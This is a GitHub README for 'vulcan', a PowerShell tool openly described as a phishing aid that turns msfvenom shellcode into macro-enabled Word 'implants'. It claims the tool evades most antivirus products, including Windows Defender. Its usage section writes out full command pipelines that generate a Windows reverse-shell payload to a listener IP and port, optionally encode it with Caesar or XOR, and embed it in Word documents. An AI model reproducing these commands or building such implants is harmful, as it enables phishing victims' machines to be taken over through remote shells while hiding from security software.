A PowerShell script that simplifies life and therefore... phishing.
BSD-3-CLAUSE License
A PowerShell script to automate the creation of consistent and efficient macro-enabled Word documents. At the time of writing, the indirect template yields great results at evading most AVs, including Windows Defender in some cases.
This PowerShell script can be viewed as a kind of third-party add-on to MSFVenom, made possible thanks to Windows Subsystem for Linux, that leverages templates to quickly and easily create (encoded) Word implants.
Users/stargazers are greatly encouraged to contribute to improving and extending this project.
(.\assets\decoders) -> do not hesitate to submit new templates.
Visual Basic templating (.\assets\templates) -> do not hesitate to submit new templates.
Visual Basic line-continuation limitations using -Treshold.
Clone this repository:
git clone https://github.com/aress31/vulcan
cd vulcan
Load the PowerShell scripts:
Import-Module -Name .\Vulcan.psm1
(Optional) List available commands:
Get-Module -Name vulcan | select -ExpandProperty ExportedFunctions
Run vulcan:
wsl --exec msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
Although obvious, windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread is a placeholder in the above example...
Get-Help -Name Invoke-Vulcan is your friend... Your best friend is Get-Help -Name Invoke-Vulcan -Detailed. Nonetheless, Invoke-Vulcan must be fed a hex-formatted shellcode. This can be achieved with:
Get-Content -Path $ShellCode | Invoke-Vulcan ...
wsl --exec msfvenom ... -f hex | Invoke-Vulcan ...
Embed a plain shellcode:
wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
Embed a Caesar-encoded shellcode:
wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-Caesar -Key 5 | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder Caesar -DecoderPath ".\assets\decoders\caesar.vba" -Key 5 -Verbose
Embed an XOR-encoded shellcode:
wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
Invoke-XOR -Key "StarWatchThisRepo" | `
Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder XOR -DecoderPath ".\assets\decoders\xor.vba" -Key "StarWatchThisRepo" -Verbose
[!WARNING] The length of the key must be shorter than the shellcode.
Although obvious, windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread is a placeholder in the above examples...
If you want to support this project and appreciate the time invested in developing, maintaining and extending it, consider donating toward my next (cup of coffee/lamborghini), as a lot of my personal time went into creating this project.
It is easy, all you have to do is press the Sponsor button at the top of this page or alternatively click this link.
Found a bug? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project?
Please submit all PRs on the GitHub pull requests tracker.
Give to Caesar (no pun intended) what belongs to Caesar:
vulcan is distributed under the terms of the BSD 3.
See LICENSE for details.